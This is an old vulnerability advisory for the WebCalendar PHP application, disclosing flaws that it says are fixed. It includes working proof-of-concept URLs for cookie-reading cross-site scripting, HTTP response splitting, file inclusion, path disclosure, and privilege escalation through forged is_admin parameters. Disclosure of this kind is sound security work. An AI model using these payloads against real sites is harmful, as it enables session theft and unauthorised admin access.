--------------------------------------------------------------------------- 
              Multiple Vulnerabilities in WebCalendar 
--------------------------------------------------------------------------- 
 
Author: Jose Antonio Coret (Joxean Koret) 
Date: 2004  
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
WebCalendar - Web Calendar Application 
 
WebCalendar is a PHP application used to 
maintain a calendar for a single user  
or an intranet group of users. It can also be 
configured as an event calendar. 
 
Web : http://webcalendar.sourceforge.net 
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Cross Site Scripting Vulnerabilities in various 
scripts. 
 
A1. WebCalendar check the <script>any</script> 
format of XSS attacks but 
doesn't check <img src based attacks. To test the 
vulnerabilities you can try 
the following POCs:  
 
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001 
 
http://<site-with-webcalendar>/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009 
 
http://<site-with-webcalendar>/demo/usersel.php?form=editentryform.elements[20];
%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2 
 
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001 
 
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001 
 
http://<site-with-webcalendar>/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)> 
 
http://<site-with-webcalendar>/demo/includes/styles.php?FONTS=asdf}%0A--></style>&lt;script&gt;alert(document.cookie)&lt;/script&gt; 
NOTE: Almost any GLOBAL parameter in this script 
is vulnerable 
 
 
B. HTTP Response Splitting Error 
 
B1. Due to a poor input validation in the script 
login.php HTTP Response Splitting  
attacks are possible. You can try the vulnerability 
with the following POC :  
 
http://<site-with-webcalendar>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi 
to all 
 
 
C. Possible code execution 
 
C1. If an attacker is abble to upload a file via ftp or 
other system to the web directory 
there is a flaw that allows to execute any file in the 
web tree. To try the vulnerability 
you can try this url :  
 
http://<site-with-webcalendar>/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other 
 
Note: Almost this is a full path disclosure. 
 
D. Full Path Disclosure 
 
D1. Because of a poor validation of the parameter 
enconded_login in the PHP script 
validate.php, there is a vulnerability that shows 
the full path of the script in the  
web server. 
 
http://<site-with-webcalendar>/demo/includes/validate.php?encoded_login= 
(Full Path Disclosure) 
 
E. Admin Privileges 
 
E1. To make various actions you need to be the 
administrator of the webcalendar 
application but various scripts are vulnerable to 
Variable Poisoning attacks.  
Privilege escalation is possible using the following 
methods :  
 
 
Example 1 :  
 
You doesn't have permission:  
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true 
 
But using it yes: 
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true 
 
Example 2 :  
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true&id= 
 
Example 3 :  
 
No permission -> 
http://webcalendar.sourceforge.net/demo/upcoming.php 
Permission Granted :) -> 
http://webcalendar.sourceforge.net/demo/upcoming.php?public_must_be_enabled=true&public_access=Y 
 
Notes 
~~~~~ 
 
The poor method that uses to protect against XSS 
attacks in the script functions.php 
is the following : 
 
// This code is a temporary hack to make the 
application work when 
// register_globals is set to Off in php.ini (the 
default setting in 
// PHP 4.2.0 and after). 
if ( ! empty ( $HTTP_GET_VARS ) ) { 
  while (list($key, $val) = 
@each($HTTP_GET_VARS)) { 
    // don't allow anything to have &lt;script&gt; in it... 
    if ( ! is_array ( $val ) ) { 
      if ( preg_match ( "/<\s*script/i", $val ) ) { 
        echo "Security violation!"; exit; 
      } 
    } 
 
Is very easy to by pass these basic security checks 
by using Unicode encoded strings,  
or using any other valid XSS attack, such as <img 
src attacks. 
 
More Notes 
~~~~~~~~~~ 
 
The developers (in special Jeff Hoover) of 
WebCalendar has been demostrated  
seriousness with the fixes and responses about 
these errors. 
 
The fix: 
~~~~~~~~ 
 
The problems has been fixed in the CVS repository. 
 
Disclaimer: 
~~~~~~~~~~~ 
 
The information in this advisory and any of its 
demonstrations is provided 
"as is" without any warranty of any kind. 
 
I am not liable for any direct or indirect damages 
caused as a result of 
using the information or demonstrations provided 
in any part of this 
advisory.  
 
--------------------------------------------------------------------------- 
 
Contact: 
~~~~~~~~ 
 
	Joxean Koret at 
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es